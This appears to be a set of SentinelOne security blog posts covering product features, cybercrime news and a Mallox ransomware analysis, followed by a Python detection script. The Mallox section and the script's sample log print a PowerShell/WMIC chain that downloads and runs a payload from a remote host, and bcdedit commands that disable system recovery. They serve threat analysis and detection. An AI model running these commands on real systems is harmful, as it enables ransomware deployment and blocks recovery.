Ingesting third-party data is simple with Singularity Marketplace, an ecosystem of data connectors to integrate with industry-leading solution providers. Empower teams to quickly collect and normalize all types of data, with one-click installation, into the Open Cybersecurity Schema Framework (OCSF) for a broad view of security and data analytics.

By leveraging the standards-driven OCSF-ready connectors from Marketplace, Singularity Data Lake simplifies cybersecurity and IT operations by eliminating the need for teams to manage parsers and handle data normalization. This simplified data ingestion promotes cost efficiency and scalability–translating into significant cybersecurity cost savings.

Singularity Data Lake offers advanced threat detection, investigation, incident response, and contextualized threat intelligence. This empowers security professionals with the tools necessary to stay ahead of potential breaches, ensuring swift and effective blocking, removal, and mitigation of threats.

As compliance needs evolve, organizations that select Singularity Data Lake for their security and log analytics can pick from a variety of short-range retention periods, including up to 360 days. Thanks to its high-scale, cloud-native data lake architecture combined with a massively parallel query engine, Singularity Data Lake ensures data is always readily available in hot storage, for both short and long-range retention and querying.

For organizations looking to prolong data storage, teams can opt for long-range retention and long-range queries spanning one to five years. Unlike traditional solutions on the market which involve storing long-term data in slow cold storage, Singularity Data Lake’s high-performance search and availability allow for instant access at any time.

What’s more, it’s not just about data centralization. SentinelOne’s multi-tenancy and role-based access controls allow organizations to efficiently partition data and delegate responsibilities. Organizations can also gain unique insights from customizable dashboards, transforming raw data into actionable insights, tailored to specific needs.

In a nutshell, Singularity Data Lake empowers organizations to navigate the ever-evolving threat landscape confidently. By making data easier to centralize, transform, and retain, security teams can gain faster detection, advanced analysis, and enhanced investigation capabilities. Singularity Data Lake is a comprehensive security and log analytics platform that improves security outcomes and keeps organizations secure in today’s digital landscape.

AI-Powered Security Platform

Singularity Data Lake powers the Singularity Platform, the first AI security platform to provide enterprise-wide visibility and protection, bringing all enterprise data together in a unified data lake to reduce risk and help protect businesses. Any organization with Singularity Platform included in their subscription such as Singularity Complete, Singularity Commercial, and Singularity Enterprise customers already have access to Singularity Data Lake with up to 10GB per day of third-party data ingestion, not including native security data from SentinelOne, at no additional cost. Customers can increase this ingestion volume and add long-range retention and queries of up to five years.

Enhanced Standalone Singularity Data Lake

We often hear from organizations that the top pain points of traditional SIEM solutions are cost and performance. As data growth outpaces budgets, security and IT teams leave important data behind and ingest only what they can afford. This can create gaps in investigation, triage, hunting, and response, as well as compliance issues. When attacks happen, security teams often need to look back much further than the last 14 or 30 days.

To help organizations move away from a costly and slow traditional SIEM solution and accommodate compliance needs, Singularity Data Lake is also available as a standalone product, serving as a robust, high-performance security and log analytics solution. The same short and long-range retention and long-range query options are also available.

With our innovative Singularity Data Lake, we’re empowering security teams with SIEM and XDR capabilities beyond their existing legacy SIEM solutions. The standalone offering of Singularity Data Lake provides the following capabilities:

  • Centralize all data into a unified data lake for streamlined analysis.
  • Search effortlessly across all ingested data to find crucial insights quickly.
  • Access the Singularity Marketplace seamlessly, equipped with dozens of OCSF-ready data connectors that ensure automatic normalization of security data.
  • Manage access to multiple organizations with multi-tenancy and Role-Based Access Control (RBAC) capabilities to efficiently partition data and responsibilities.
  • Customize dashboards for better visualization, transforming ingested data into actionable insights.
  • Utilize PowerQuery to craft precise detections that enhance cybersecurity posture.

Learn More

To learn how to transform security and log analytics, meet our team for a demo. For existing SentinelOne customers, please contact your SentinelOne account team to discuss how to further leverage the Singularity Data Lake.

December 2023 Cybercrime Update | Extortion Trends, Identity-Focused Attacks & Counter-Operations
https://www.sentinelone.com/blog/december-2023-cybercrime-update-extortion-trends-identity-focused-attacks-counter-operations/ (Tue, 19 Dec 2023 14:32:01 +0000)

In this blog post, we delve into the notable trends that have been shaping the cyber landscape over the past month. Several high-profile threat operators have continued to briefly disappear only to re-emerge, making for a more dynamic ransomware landscape. Highlighting the risks in the identity attack surface, we also continue to see the fallout from this season’s onslaught of attacks against Identity and Access Management (IAM) platforms specifically. Finally, this post discusses new cyber initiatives and counter-operations from the federal government to support global collaboration across the cyber threat environment, as well as recent law enforcement wins.

Emerging Pressure Tactics In Ransomware Schemes

In the latest ransomware and extortion operations, financially motivated actors are finding new ways to pressure their victims into complying with their demands. Groups like ALPHV, for example, are now openly threatening to report victims to the SEC for failing to publicly disclose breaches, breaches that the attackers themselves committed. We have also observed groups like Rhysida threatening to expose illicit and incriminating material discovered in the exfiltrated victim data.

Recent developments in legal frameworks, including the SEC’s updated rules for cybersecurity incident reporting, GDPR, and existing data protection laws, are being manipulated to increase pressure on organizations that are already at risk. Cybercriminals are using these regulations to heighten victims’ fears of legal repercussions and damage to their reputation, thereby forcing them into paying ransoms.

This trend highlights the urgency for organizations to bolster their cybersecurity measures, adhere to regulatory standards, and stay prepared for the ever-changing landscape of cyber threats. With cybercriminals constantly seeking innovative methods to exploit businesses, it is important for cyberdefense teams to maintain vigilance and adaptability in their approaches to counter these advancing threats.

A previous blog post we published discusses the increasing “leveling up” of pressure tactics coupled with troubling victimology, painting a potentially problematic picture of how attacks are likely to play out in the near future. Companies dealing with this multi-pronged extortion onslaught include the likes of Toyota, Delta Dental, Fred Hutch Cancer Center, Kraft Foods, Idaho National Lab and more. There is more potential damage being done now in the big-game ransomware operation attacks and the frequency of these attacks deserves much consideration.

Multi-looting is among the tactics used in these more extensive modern operations; one example of this emerging behavior played out between ALPHV and medical product manufacturer Henry Schein. According to reports, this victim experienced multiple encryptions during recovery and negotiation.

On Again, Off Again | Fluctuations In Ransomware Groups

As of this writing, the FBI has officially confirmed their seizure of the primary BlackCat/ALPHV infrastructure. The TOR sites have been seized and victims are now able to obtain decryption tools from the FBI via an IC3 filing. Victims of BlackCat ransomware are strongly encouraged to contact their FBI field office for further information and to determine next steps and options for assistance.

This is a sizeable victory indeed, as per the FBI’s notice: “Blackcat actors have compromised computer networks in the United States and worldwide. The disruptions caused by the ransomware variant have affected U.S. critical infrastructure – including government facilities, emergency services, defense industrial base companies, critical manufacturing, and healthcare and public health facilities – as well as other corporations, government entities, and schools. The loss amount globally is in the hundreds of millions and includes ransom payments, destruction and theft of proprietary data, and costs associated with incident response.”

Within a similar timeframe, NoEscape also appeared to have closed up shop whilst holding onto millions of dollars in funds due to their affiliates. This is known as an exit scam, and the primary operators of NoEscape appear to have ceased communicating with both their partners and affiliates. There are a number of arbitration complaints against the operators on various major crimeware forums. These same forums and dark markets appear to have banned the operators from further activity in those forums.

Forum complaints against NoEscape

Adding to the already foggy situation, LockBit ransomware operations are reportedly attempting to recruit affiliates directly from the potential pool of those that have been “done wrong” by NoEscape and ALPHV operations.

LockBit poaching from NoEscape and ALPHV

A Year End Rise In Identity-Focused Attacks

Identity compromise, and the subsequent use of valid credentials to perform illegitimate activities, is nearly ubiquitous in the modern landscape of cyberattacks. IAM platforms play a crucial role in both enhancing security and improving user experience by streamlining access processes within an organization. They are particularly important in large and medium-sized businesses where managing a large number of user identities and permissions is a complex task.

The compromise of market-leading IAM platforms continues to grow and expand as we head towards the end of 2023. When we discuss the compromises of enterprises like 1Password, LastPass, BeyondTrust, and other identity management providers, the thing to keep in mind is the long-term, downstream effects. Beyond the immediate problem of compromised credentials and accounts, victims also face the legal issues that may arise, reputational damage, and the associated loss of revenue. Consider also that, once a platform is compromised, it is trivial for the attacker to use it to intercept the data and traffic of the platform’s users. In this scenario, a single compromise of an IAM provider extends to many victim environments.

The consequences of a security breach in an IAM platform are far-reaching and can impact an organization on multiple fronts, including financial, legal, operational, and reputational aspects. It underscores the critical importance of robust security measures and constant vigilance in managing these systems. The downstream effects of breaches within the likes of 1Password, LastPass, and similar will be felt going into 2024 and beyond.

Forum and Dark Market Updates

We previously discussed ongoing cyber activity occurring on Telegram in our September cybercrime update. In the context of low-sophistication cybercrime marketing and sales, Telegram has collected a reputation for being a “Wild Wild West-like” hub for criminal activities. Accounts, proxy access, mail/identity lists and data, VPS services, FUD crypting, bank logs, and SIM/cell carrier services (aka SIM-swapping) are all available with essentially zero barrier to entry. Cybercrime actors of all types continue to congregate within relevant Telegram channels.

Service updates and options from Darkside Hackerzone

Given the approaching holiday season, we are seeing many channels and bots providing pseudo-sales and promotions on malware kits, tools, and other illicit services.

PayPal and CashApp accounts for sale
Holiday promo for malicious finance app transfer services
Holiday-themed sales

On the subject of forums, the Clearnet forum launched by Cyber Drag0nz in September appears to now be down or defunct. In a broader trend, it seems that many of the smaller Middle-Eastern crimeware operations, which have been amplified with the onset of the Israel-Hamas war, are showing their true size and abilities.

Now defunct Cyb3r Drag0nz forum

New Initiatives and Counter-Operations

In the final month of 2023, the information security community has seen more law enforcement activities such as crackdowns and arrests in parallel with some new and positive developments from the recent Counter Ransomware Initiative (CRI) Summit.

At the tail end of November, a large-scale operation out of Europol led to the arrests of numerous ransomware affiliates associated with LockerGoga, MegaCortex, Hive, and Dharma. This action follows the initial wave of arrests that occurred in 2021. The recent action was focused across regions in Ukraine. Considered a large victory for global law enforcement agencies, these takedowns go some considerable distance in chipping away at the infrastructure of known threat actors.

Notably, we also saw the arrest of an alleged ringleader of the Kelvin Security hacking group this past month in Spain. The detainee was a primary figure in an associated money laundering activity which focused on cryptocurrency exchanges. This is an especially satisfying victory for law enforcement given the scope of the involved victimology. According to the released statements, the group has operated since 2013 and has carried out more than 300 high-level cyberattacks in the last three years, targeting strategic industries in over 90 countries, including the U.S., Germany, Italy, Argentina, Chile, and Japan.

Along those lines, an individual known as FFX pleaded guilty to charges surrounding their involvement in the development of Trickbot malware. Specifically, the Russian national was known for their contributions to the malware’s browser injection components, along with mechanisms for deployment and management of additional code (e.g., ransomware payloads). The developer currently faces a maximum sentence of 35 years in prison for charges related to computer fraud, identity theft, wire fraud, and bank fraud.

Recent developments from the highest levels of government are set to shape upcoming cybersecurity initiatives in the new year. At the latest Counter Ransomware Initiative Summit, members from across the world focused on global collaboration in ongoing cybersecurity strategies. Representatives from 50 countries discussed new methods to combat ransomware threats. Key topics included strengthening international cooperation, tackling financial underpinnings of ransomware, and enhancing public-private partnerships. The summit highlighted the evolving role of AI in cybersecurity and emphasized the importance of information sharing and policy initiatives to disrupt ransomware financing. These efforts aim to build a more resilient global cybersecurity infrastructure against the growing threat of ransomware.

Conclusion

After examining the past month, several compelling trends continue to demand our attention. High-profile threat operators, momentarily vanishing only to resurface later, have rendered the ransomware landscape more dynamic than ever. Ongoing attacks on leading IAM platforms signal to security leaders the very real vulnerabilities linked to the identity surface. Cybercriminals are shifting towards new methods of pressuring their victims to pay exorbitant ransoms.

In the wake of these challenges, new cyber initiatives and counter-operations spearheaded by international federal governments are in place to address and push innovation in incident response, threat intel sharing, and other preventative measures.

In the face of these emerging trends, employing a comprehensive security solution like SentinelOne’s Singularity XDR, which leverages AI and automated remediation, can serve as a potent weapon in an organization’s cybersecurity arsenal. It’s more crucial than ever to stay ahead of the curve, adopting proactive measures that help detect and mitigate threats before they can inflict significant damage.

To learn more about how SentinelOne can help defend your organization’s endpoint, cloud, and network assets, contact us or request a free demo.

Decrypting SentinelOne Detection | The Behavioral AI Engine in Real-Time CWPP
https://www.sentinelone.com/blog/decrypting-sentinelone-detection-the-behavioral-ai-engine-in-real-time-cwpp/ (Mon, 18 Dec 2023 14:39:36 +0000)

In October, the first blog post in this series discussed the Static AI Engine. In this, the second installment of the Detection Engine blog series, we examine the SentinelOne Behavioral AI Engine. Although AI, and especially GenAI, is a very hot topic right now, SentinelOne has used AI as a keystone of its technology since our founding in 2013. We hope that this blog series conveys to our customers, prospects, and stakeholders how our AI-powered agent in Singularity Cloud Workload Security is uniquely equipped to create substantial value in delivering real-time cloud workload protection.

Our real-time CWPP solution uses five detection engines, each working to complement the other, to detect runtime threats impacting cloud workloads.

  • Static AI Engine
  • Cloud Intelligence Engine
  • App Control Engine
  • Behavioral AI Engine
  • STAR Rules Engine

Behavioral AI Engine 101

SentinelOne’s Behavioral AI Engine detects and mitigates previously unknown threats by monitoring kernel process actions and memory usage. This form of AI is not bypassed by malicious countermeasures, and readily identifies sophisticated threats including:

  • Fileless attacks
  • Ransomware, including polymorphic ransomware
  • Zero-day exploits
  • Credential theft
  • Privilege escalation
  • Malicious scripts
  • MITRE tactics and techniques
  • And more.

The Behavioral AI Engine has several characteristics:

  • Autonomous operation: It functions fully with or without an internet connection to the SaaS management console. The intelligence of the engine is built within the agent itself such that there is no round-trip latency to the cloud for analysis.
  • Real-time: The agent monitors all kernel-level processes as they are launched.
  • Post-execution: Unlike the Static AI Engine, which examines files before they are executed, the Behavioral AI Engine is constantly observing all processes as they execute.
  • Storyline™: Our patented visualization technology that tracks what’s happening inside of each cloud workload.

What is Storyline™?

To truly appreciate the inner workings of the Behavioral AI Engine, one must understand the role of SentinelOne’s Storyline technology. Storyline accelerates attack responses, reduces atomic alert noise, and surfaces actionable context for security analysts. Here is how it works.

SentinelOne’s CWPP supports 14 (and counting) Linux distributions and 20 years of Windows Servers. Storyline observes all concurrent kernel processes, malicious and benign. It automatically “connects the dots” (i.e., identifies relationships) between related processes and preserves context such as process metadata. The AI monitors each thread against probabilistic thresholds of normalcy which, when crossed, trigger instantaneous protection against machine-speed attacks.

Because the CWPP agent has the Behavioral AI Engine’s intelligence built-in, the AI makes this judgment autonomously. There is no round-trip latency to the cloud for processing or for human analysis. The AI identifies and stops the spread of machine-speed evil in real-time, at the edge. Process threads, or storylines, deemed suspicious or malicious may be remediated (e.g., process kill and file quarantine) according to policies which are owned and governed by the customer, and which are easily modified via the management console.

Every thread is preserved in the SentinelOne Singularity Data Lake according to the data retention period the customer has selected. Therein, the workload telemetry may be queried, inspected, and used for threat hunting and/or further analysis. The following example walks through a representative behavioral detection and subsequent analysis.

Example: Behavioral Detection of a Python Script

In this example, we have a Kubernetes cluster running in Amazon EKS (Elastic Kubernetes Service), with Singularity Cloud Workload Security for Kubernetes deployed for real-time cloud workload protection.

For illustration purposes, we will launch a shell script via command injection, which will in turn download a python script and initiate a sequence of events and trigger the Behavioral AI Engine.

Additionally, the CWPP response policies are set to Detect Mode for suspicious threats (i.e., those which the engine detects with reasonable confidence), and Protect Mode for malicious threats (i.e., those which the engine assesses with high confidence). Recall that the algorithms in our detection engines have been trained over the course of several years on hundreds of millions (nearly a billion) of malware samples.

Detection

In the following figure, we see that the Behavioral AI Engine was triggered by what it deemed to be a suspicious threat. The details captured include the path to the source process (i.e., python), all the command line arguments, which point to a base64-encoded script, the process user, and the originating process, which is containerd.

Behavioral detection triggered by a suspicious threat

Additional details include:

  • information about the AWS EC2 instance running the k8s cluster (e.g., account ID, region, instance ID, network, tags, etc) on the CLOUD tab,
  • info on the cluster itself (e.g., namespace, pod, and container image) on the KUBERNETES tab, and
  • mapping of telemetry to MITRE TTPs on the THREAT INDICATORS pane.

All of this information can be used to accelerate an incident response investigation.

Rich details in the console for incident response

Analysis

By clicking on EXPLORE along the top of the management console, the security analyst can look at the process tree which Storyline has automatically assembled. The originating process, the containerd runtime, is shown in blue, indicating that the container runtime itself is not suspicious.

In itself, this is unsurprising, though it does indicate that the suspicious process is containerized. The Behavioral AI Engine first triggers a suspicious alert on the child bash process, which in turn spawns other child processes.

Note that the attack sequence is allowed to continue because the policy is set to Detect Mode. Each event in the sequence has process details recorded by the agent and shown in the right panel. It is worth noting that only an agent can deliver real-time threat detection and kernel process-level visibility, key for subsequent investigation, minimizing dwell time, and balancing risk management.

Exploring the execution chain

By simply following the visual sequence of events in the chain, each with its forensic details automatically recorded to the Singularity Data Lake by SentinelOne’s real-time CWPP, we quickly come to the python process itself. Here, the command line details shown in the right panel are much more telling. This is the malicious base64-encoded shell.

The security analyst now understands that a threat actor has accessed a specific k8s worker node (name, label, EC2 instance ID, region), installed a containerized web server, and, via command injection, downloaded a shell script which kicked off a python script that launched a base64-encoded web shell.

The explorer displays the base64-encoded command line used by the attacker

If arriving at that understanding seems like a lot of work, consider that CWPP and Storyline automatically assembled it all in an easy-to-follow sequence, compressing potentially hours of analysis into just a few minutes. And if those events seem like a lot of noise, consider that there is only a single alert per storyline, suppressing noise so that the analyst can focus on root cause analysis.

Remediation

Now that the attack is understood, the security analyst can initiate a 1-click remediation action in the management console, such as process kill – which stops all processes related to the threat sequence – and file quarantine, to encrypt the threat file and its executables. Recall, for this example, the customer policy was set to Detect Mode. Had the policy been set to Protect Mode, the CWPP solution would have initiated remediation actions (again, governed by policy) when the threat was detected.

The analyst can also open a JIRA or ServiceNow ticket, using the integrations available in Singularity Marketplace, conveniently accessed via the SentinelOne management console. Knowing that this incident impacted a containerized workload running on a managed Kubernetes service (i.e., Amazon EKS), it is a good bet that this customer has a solution such as Snyk Container to manage vulnerabilities in the workload source code.

By virtue of our CWPP integration with Snyk, the runtime threat detection is automatically enriched with details from Snyk about known vulnerabilities it found in the source code. This information can be used to enrich the ticket and route it to the appropriate DevOps owner, to investigate and resolve exploited vulnerabilities at the source.

Simple one-click remediation in the console mitigates the threat

Now that the suspicious threat has been mitigated, the analyst may wish to query the Singularity Data Lake to see what network activities are associated with this specific storyline. Doing so is as simple as a 1-click pivot on the “Storyline” field in the console, as shown here.

Such a query may reveal a pattern of communication back to specific IP addresses, which can then in turn, be hunted across the rest of the workload telemetry in the data lake, to understand what other activity, if any, the threat actor may have initiated.

Conclusion

If the Static AI Engine is the workhorse of our real-time CWPP solution, then the Behavioral AI Engine is the fusion reactor. By monitoring hundreds, even thousands, of concurrent kernel process threads, our Behavioral AI Engine is able to recognize when a sequence of related events exceeds statistical norms.

In this way, the Behavioral AI Engine detects even the most sophisticated or as yet unknown threats in real time and records extensive attack details so that incident response is streamlined and an in-depth understanding achieved.

To learn more about the value of real-time CWPP in your cloud security stack, head over to the solution homepage, or see how Singularity Cloud Workload Security works with a 2-minute guided walk-through here. And of course, whenever you are ready, you may connect with one of our cloud security experts for a personalized demo.

The Good, the Bad and the Ugly in Cybersecurity – Week 50
https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-50-5/ (Fri, 15 Dec 2023 14:00:27 +0000)

The Good | US Detains Suspects in $80 Million ‘Pig Butchering’ Cryptocurrency Scam

Online financial crime resulted in losses of $3 billion last year, with cryptocurrency investment fraud rising by 183%, according to statistics released by the FBI. Good to hear, then, that the Department of Justice has this week arrested two individuals and charged another four over a cryptocurrency investment scam that allegedly netted the gang over $80 million.

The indictment accuses Lu Zhang, Justin Walker, Joseph Wong, and Hailong Zhu of operating a complex network of shell companies and bank accounts. These were allegedly used to launder money from victims lured into ‘pig butchering’ scams. The criminals built trust with their victims through messaging apps, dating platforms, and social media, before deceitfully draining their cryptocurrency wallets.

Two of the suspects, Zhang and Walker, appeared in a federal court in Los Angeles to face charges including conspiracy to commit money laundering, with potential sentences of up to 20 years if convicted.

According to the Justice Department, the gang’s activities involved at least 284 transactions and resulted in more than $80 million in victim losses. More than $20 million in stolen funds was directly deposited into bank accounts associated with the suspects.

The law enforcement action underscores the growing threat of online investment scams, particularly those involving cryptocurrencies, and highlights the need for vigilance in the ongoing battle against digital financial crimes.

The Bad | Microsoft Accounts Targeted Through Misuse of OAuth Applications

Threat actors are increasingly targeting Microsoft accounts by exploiting OAuth applications for a range of malicious activities, including BEC (Business Email Compromise), phishing, spamming, and cryptocurrency mining, researchers said this week. An investigation uncovered approximately 17,000 malicious multi-tenant OAuth applications created using compromised Microsoft accounts, leading to over 927,000 phishing emails in a campaign running from July to November 2023.

Attackers are focusing on Microsoft user accounts with weak authentication, such as those lacking multi-factor authentication (MFA), and employing phishing or password-spraying tactics to gain control. Once access is secured, they create new OAuth applications with high privileges, enabling them to stay under the radar while maintaining persistent access.

In one case, APT actor Storm-1283 used OAuth attacks to deploy virtual machines for cryptocurrency mining, causing financial losses to multiple organizations from $10,000 to $1.5 million.

In another, an attacker exploited OAuth applications for phishing campaigns and BEC reconnaissance, using Microsoft’s Outlook Web Application (OWA) to search for “payment” and “invoice” related information through compromised accounts.

Across several instances, attackers were found to have created multi-tenant OAuth apps for persistence, creating new credentials, and sending phishing emails via the Microsoft Graph API.

Admins are urged to ensure that MFA is required on all accounts and to enforce conditional access policies wherever possible. Accounts should be monitored for unusual or risky behavior and revoked if found to be suspicious.

The Ugly | Ukraine Mobile Network Hit As Russian Tax Service Attacked By Malware

Ukraine’s largest mobile network operator, Kyivstar, suffered a massive cyberattack earlier this week, leaving more than half of the nation’s population without crucial mobile and internet services. The attack disrupted IT infrastructure as well as air raid alert systems across several regions.

Kyivstar’s official website went offline, but the company said on social media that it had been targeted by “a powerful hacker attack”, which it attributed as a direct consequence of the Russian war on Ukraine. Kyivstar CEO Oleksandr Komarov was reported as saying that the attack had significantly damaged the company’s infrastructure, adding that “we could not counter it at the virtual level, so we shut down Kyivstar physically to limit the enemy’s access.”

In the wake of the disruption, it is being suggested that while major services like mobile internet, voice services, and SMS should be restored soon, a full recovery of all services could take several weeks.

Initially, Russian hacktivist group Killnet made unsubstantiated claims to be behind the attack. By Wednesday, another group called Solntsepyok, believed to be linked to Russian military intelligence APT Sandworm, posted screenshots on Telegram purporting to show how it accessed Kyivstar’s servers, stating that “We attacked Kyivstar because the company provides communications to the Ukrainian Armed Forces, as well as state bodies and Ukraine’s security forces”.

“Solntsepek hackers” claim responsibility for the Kyivstar attack

In a worrying sign of how civilian critical infrastructure is increasingly a target in cyber warfare, Ukraine announced on the same day as the Kyivstar attack that its defense intelligence directorate (GUR) had infected thousands of Russian servers used by Russia’s state tax service, destroying databases and backups. The statement said the attack had led to the complete destruction of Russia’s federal tax service (FNS) infrastructure.

Mallox Resurrected | Ransomware Attacks Exploiting MS-SQL Continue to Burden Enterprises
https://www.sentinelone.com/blog/mallox-resurrected-ransomware-attacks-exploiting-ms-sql-continue-to-burden-enterprises/ (Wed, 13 Dec 2023 14:02:41 +0000)

The ransomware landscape is characterized by a heavy churn in both actor groups and malware families, with only a few players exhibiting relative longevity. Once feared threats such as REvil and Conti have either been dismantled or dissolved, while others – ALPHV, Black Basta and LockBit, for example – continue to extort businesses with impunity. To this second list we can also add Mallox (aka TargetCompany), a lesser-known but long-running ransomware threat first seen in 2021. Today, the group continues to steal and leak a steady stream of enterprise data.

In this post, we highlight recent Mallox activity, explain the group’s initial access methods and provide a high-level analysis of recent Mallox payloads to help defenders better understand and defend against this persistent threat.

Mallox Ransomware Overview

Operating under a Ransomware-as-a-Service (RaaS) model, Mallox leverages well-known underground forums and markets such as Nulled and RAMP to advertise its service and recruit affiliates. The group maintains a TOR-based leaks site where it regularly makes announcements about recently compromised organizations and exposes stolen data. Mallox also maintains a presence on Twitter/X for similar purposes.

Mallox on social media platform X/Twitter

Initial Access | Focus on MS-SQL & Brute Force Attacks

Mallox primarily gains initial access through the exploitation of vulnerable and publicly exposed services, with a particular focus on MS-SQL (Microsoft SQL Server) and ODBC (Open Database Connectivity) interfaces. Specific vulnerabilities are targeted, including unpatched instances of old remote code execution (RCE) vulnerabilities like CVE-2019-1068 in Microsoft SQL Server and CVE-2020-0618 in Microsoft SQL Server Reporting Services.

In addition, the group makes successful use of brute force attacks against weakly configured services and applications open to the public internet. In recent campaigns, Mallox actors gained initial access through dictionary-based brute-force attacks against weak MS-SQL interfaces. However, other vectors are known to be used by Mallox affiliates, including phishing emails that deliver attack frameworks such as Cobalt Strike and Sliver.

Post-Compromise Attack Behavior

After gaining initial access, Mallox threat actors typically execute PowerShell commands to run various batch scripts and download the ransomware payload.

Scripts such as Kill-Delete.bat or Bwmeldokiller.bat are used to terminate or remove running processes that may interfere with or prevent the ransomware’s encryption routine.

Example of the kill-delete.bat script

Commands are executed to download and launch the ransomware payloads. The following provides a typical example:

/C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 &
echo $cl.DownloadFile("hXXp://80[.]66.75.40/XXXXXXXXX.exe", "%TEMP%\xxxx.exe") >> %TEMP%\updt.ps1 &
powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 &
WMIC process call create "%TEMP%\XXXXXXXX.exe"

The command sequence first writes a PowerShell script into the system’s temporary directory, using the .NET WebClient class to download an executable from a remote server. The updt.ps1 script is then run with the -ExecutionPolicy Bypass flag, which sidesteps any execution policy restrictions and ensures an unrestricted run. Finally, the command sequence uses Windows Management Instrumentation (WMIC) to launch the downloaded ransomware payload.

Recent Payloads | Mallox.Resurrection

Mallox variants from 2021 to today display a highly consistent set of core functionalities, indicating that threat actors continue to achieve success with a tried and tested formula. Recent payloads are labeled “Mallox.Resurrection”, reflecting a change in the ransom notes deposited after encryption.

Hard-coded exclusions exempt a number of file types and processes from encryption. File types are excluded through named extensions:

.386 .adv .ani .avast .bat .bin .cab .cmd .com .cpl .cur 
.deskthemepack .diagcfg .diagpkg .diangcab .dll .drv .exe 
.Globeimposter-Alpha865qqz .hlp .hta .icl .icns .ico .ics .idx 
.key .lnk .lock .mallox .mallox .mod .mpa .msc .msi .msp .msstyles 
.msu .nls .nomedia .ocx .prf .ps1 .rom .rtp .scr .shs .spl .sys .theme .themepack .wpx 

Processes are excluded or ignored based on the existence of certain strings in the path name (e.g., “Windows Defender”).

"$windows ~bt"                  "Package Store"
"$windows ~ws"                  "Package"
"appdata"                       "perflogs"
"application data"              "programdata"
"Assemblies"                    "Reference"
"boot"                          "Store"
"boot"                          "system volume information"
"Common Files"                  "tor browser"
"Core Runtime"                  "Windows"
"google"                        "Windows Defender"
"intel"                         "Windows Kits"
"Internet Explorer"             "Windows Mail"
"Microsoft Analysis Services"   "Windows Microsoft NET"
"Microsoft ASP NET"             "Windows NT"
"Microsoft Help Viewer"         "Windows Photo Viewer"
"Microsoft MPI"                 "Windows Portable Devices"
"Microsoft Security Client"     "windows old"
"Microsoft Security Client"     "Windows"
"Microsoft NET"                 "WindowsPowerShell"
"mozilla"

Upon launch, the ransomware spawns the following commands:

bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {current} recoveryenabled no

These serve to alter the Boot Configuration Data (BCD) settings, affecting the OS’s ability to recover from failure and preventing administrators from restoring the system with Windows built-in tools.
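The dropper command chain described under Post-Compromise Attack Behavior and the bcdedit tampering above both surface in process-creation telemetry, which makes them a natural target for a detection rule. The following is an added example, not SentinelOne’s code: it runs a handful of regex rules over constructed log lines in an assumed “timestamp | image | command line” format and correlates the stages; the host address, paths and file names in the sample log are placeholders, not the post’s indicators.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str      # name of the rule that fired
    line_no: int   # 1-based index into the scanned log
    command: str   # the command line that matched


# (rule name, pattern). Case-insensitive and loose on whitespace so the small
# variations seen between samples still match.
RULES = [
    # cmd.exe echoing a WebClient downloader into a .ps1 under %TEMP%
    ("ps1-dropper-via-echo",
     re.compile(r"echo\s+.*System\.Net\.WebClient.*>\s*%TEMP%\\\S+\.ps1", re.I)),
    # PowerShell launched with -ExecutionPolicy Bypass on a script in %TEMP%
    ("powershell-bypass-temp-script",
     re.compile(r"powershell(\.exe)?\s+.*-ExecutionPolicy\s+Bypass\s+.*%TEMP%\\\S+\.ps1", re.I)),
    # WMIC spawning an executable out of %TEMP%
    ("wmic-process-create-temp",
     re.compile(r'wmic\s+process\s+call\s+create\s+"?%TEMP%\\[^\s"]+\.exe', re.I)),
    # bcdedit changes that suppress boot-failure recovery
    ("bcdedit-ignoreallfailures",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{current\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("bcdedit-recovery-disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{current\}\s+recoveryenabled\s+no", re.I)),
    # process-killer batch scripts named in the post
    ("mallox-killer-script",
     re.compile(r"(kill-delete|bwmeldokiller)\.bat", re.I)),
]

# Stages of the chain; the combination is far more specific than either alone.
DOWNLOAD_EXEC = {"ps1-dropper-via-echo", "powershell-bypass-temp-script", "wmic-process-create-temp"}
RECOVERY_TAMPER = {"bcdedit-ignoreallfailures", "bcdedit-recovery-disabled"}


def parse_line(line):
    """Split 'timestamp | image | command line' into its three fields (assumed format)."""
    parts = [p.strip() for p in line.split("|", 2)]
    return parts if len(parts) == 3 else None


def scan(lines):
    """Return a Finding for every (line, rule) match; one line can hit several rules."""
    findings = []
    for n, line in enumerate(lines, 1):
        parsed = parse_line(line)
        if parsed is None:
            continue  # malformed record, skip rather than crash the scan
        cmdline = parsed[2]
        for name, rx in RULES:
            if rx.search(cmdline):
                findings.append(Finding(name, n, cmdline))
    return findings


def looks_like_mallox_chain(findings):
    """True when a host shows both a %TEMP% download/launch stage and recovery tampering."""
    names = {f.rule for f in findings}
    return bool(names & DOWNLOAD_EXEC) and bool(names & RECOVERY_TAMPER)


# Constructed sample log: two benign admin records, then a chain modelled on the post.
SAMPLE_LOG = [
    "2023-12-01T09:58:02Z | powershell.exe | powershell.exe -NoProfile -Command Get-Service",
    "2023-12-01T09:59:10Z | bcdedit.exe | bcdedit.exe /enum {current}",
    r'2023-12-01T10:00:00Z | cmd.exe | cmd.exe /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & '
    r'echo $cl.DownloadFile("http://198.51.100.10/payload.exe", "%TEMP%\payload.exe") >> %TEMP%\updt.ps1 & '
    r'powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create "%TEMP%\payload.exe"',
    r"2023-12-01T10:00:05Z | cmd.exe | cmd.exe /c C:\Users\Public\Kill-Delete.bat",
    "2023-12-01T10:00:09Z | bcdedit.exe | bcdedit.exe  /set {current} bootstatuspolicy ignoreallfailures",
    "2023-12-01T10:00:09Z | bcdedit.exe | bcdedit.exe  /set {current} recoveryenabled no",
    "malformed record without separators",
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no}: {f.rule}")
    print("chain detected:", looks_like_mallox_chain(hits))
```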

